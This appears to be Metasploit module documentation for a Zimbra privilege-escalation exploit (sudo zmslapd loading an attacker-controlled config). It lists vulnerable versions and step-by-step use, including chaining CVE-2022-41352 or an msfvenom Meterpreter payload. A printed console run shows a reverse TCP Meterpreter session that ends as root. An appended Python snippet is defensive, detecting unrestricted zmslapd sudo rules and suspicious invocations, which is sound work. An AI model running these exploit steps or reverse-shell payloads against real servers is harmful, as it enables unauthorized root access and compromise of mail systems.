Vulnerable Application
The following versions of Zimbra are vulnerable:
- Zimbra Collaboration Suite 9.0.0 Patch 26 and earlier
- Zimbra Collaboration Suite 8.8.15 Patch 33 and earlier
Verification Steps
Install Zimbra on any supported Linux version and get a session as the zimbra
user. The easiest way to exploit Zimbra is to rm $(which pax), reboot, and
use CVE-2022-41352. Or generate a Meterpreter payload with msfvenom and run
it.
From there:
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
10 meterpreter x86/linux zimbra @ zimbra.example.org 10.0.0.146:4444 -> 10.0.0.154:39800 (10.0.0.154)
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 10
SESSION => 10
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit
[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target is vulnerable.
[*] Creating exploit directory: /tmp/.5kq9XO
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3
[*] Sending stage (3020772 bytes) to 10.0.0.154
[+] Deleted /tmp/.5kq9XO
[*] Meterpreter session 13 opened (10.0.0.146:4444 -> 10.0.0.154:40044) at 2022-07-21 14:04:12 -0700
meterpreter > getuid
Server username: root
Options
SUDO_PATH
The path to sudo on the host. If we have a proper environment with $PATH set, which we generally do, simply sudo is fine.
ZIMBRA_BASE
The base where Zimbra is installed. Zimbra typically installs to /opt/zimbra, and I'm not even sure if it can install elsewhere, so this default should be fine.
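The module's check runs sudo -n -l, and its trigger starts zmslapd as root with -f pointing at a file under /tmp. The Python below is an added defender-side example, not part of this module or of Zimbra: it flags a sudo rule that lets zmslapd run with unrestricted arguments, and it scans sudo syslog lines for zmslapd being started with a config file or directory outside ZIMBRA_BASE. The sudoers output and log lines are constructed samples, and /opt/zimbra follows the ZIMBRA_BASE default described above.

```python
import re
import shlex

# Assumed install base, matching the module's ZIMBRA_BASE default.
ZIMBRA_BASE = "/opt/zimbra"
ZMSLAPD = ZIMBRA_BASE + "/libexec/zmslapd"

# Constructed `sudo -n -l` output for the zimbra user (not captured from a real host).
SAMPLE_SUDO_L = """\
User zimbra may run the following commands on zimbra:
    (ALL) NOPASSWD: /opt/zimbra/libexec/zmslapd
    (ALL) NOPASSWD: /opt/zimbra/libexec/zmmailboxdmgr
"""

# Constructed sudo syslog lines: a normal LDAP start, then the trigger shape shown above.
SAMPLE_LOG = [
    "Jul 21 14:03:50 zimbra sudo:   zimbra : TTY=unknown ; PWD=/opt/zimbra ; "
    "USER=root ; COMMAND=/opt/zimbra/libexec/zmslapd -u zimbra -g zimbra -F /opt/zimbra/data/ldap/config",
    "Jul 21 14:04:12 zimbra sudo:   zimbra : TTY=unknown ; PWD=/tmp ; "
    "USER=root ; COMMAND=/opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3",
]

SUDO_LOG_RE = re.compile(r"USER=(?P<user>\S+) ; COMMAND=(?P<cmd>.*)$")


def unrestricted_zmslapd_rules(sudo_l_output: str) -> list[str]:
    """sudo -l lines that allow zmslapd with any arguments (no argument list, or a '*' wildcard)."""
    hits = []
    for line in (raw.strip() for raw in sudo_l_output.splitlines()):
        if ZMSLAPD in line:
            # In sudoers, only an explicit "" or a fixed argument list pins the options;
            # with no list the caller may pass anything, including -f <own config file>.
            restriction = line.split(ZMSLAPD, 1)[1].strip()
            if restriction == "" or "*" in restriction:
                hits.append(line)
    return hits


def zmslapd_foreign_config_invocations(log_lines: list[str]) -> list[str]:
    """sudo log lines where root ran zmslapd with -f/-F pointing outside ZIMBRA_BASE."""
    hits = []
    for line in log_lines:
        m = SUDO_LOG_RE.search(line)
        argv = shlex.split(m.group("cmd")) if m and m.group("user") == "root" else []
        if argv[:1] != [ZMSLAPD]:
            continue
        for flag, value in zip(argv, argv[1:]):
            if flag in ("-f", "-F") and not value.startswith(ZIMBRA_BASE + "/"):
                hits.append(line)
                break
    return hits
```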